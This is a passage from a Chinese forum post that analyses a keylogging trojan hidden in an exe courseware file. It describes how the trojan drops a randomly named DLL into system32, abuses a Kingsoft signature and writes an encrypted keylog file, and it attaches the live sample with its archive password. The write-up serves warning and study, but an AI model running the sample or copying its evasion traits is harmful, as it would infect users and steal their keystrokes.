多说几句,exe启动后,会释放一个21M大小的dll,文件名也是系统目录+6位随机dll文件名,如"C:\WINDOWS\system32\mybtke.dll",这个exe与dll都用了金山的数字签名。之后有键盘动作,他就会生成一个keylog.dat在C:\WINDOWS\system32目录,用于记录键盘,不过记录文件被加密了释放出来的文件我还没去玩它。也不知道是谁这么贱,往课件里藏马,以后大家看exe教程还是沙箱里吧。我贴出样本,大家小心点玩,解压密码:52pojie。
还是第一次写文章,感觉好费时,希望大家多多支持,多提建议,共同进步。
--------------------------------------------------------------------------------
【版权声明】: 本文原创于sunflover, 转载请注明作者并保持文章的完整, 谢谢!
2013年01月16日 AM 03:40:28
贴出金山火眼分析结果:http://fireeye.ijinshan.com/analyse.html?md5=138060de3bec75d6248b9a664342af5d#full
Server.rar
(66.84 KB, 下载次数: 31)
我的udd文件:(如有错误欢迎交流指正)
Server_udd.rar
(8.72 KB, 下载次数: 10)
|
|
[复制链接]
发表于 2013-1-16 03:52
发表于 2013-1-16 21:55
|
发表于 2013-1-17 14:40
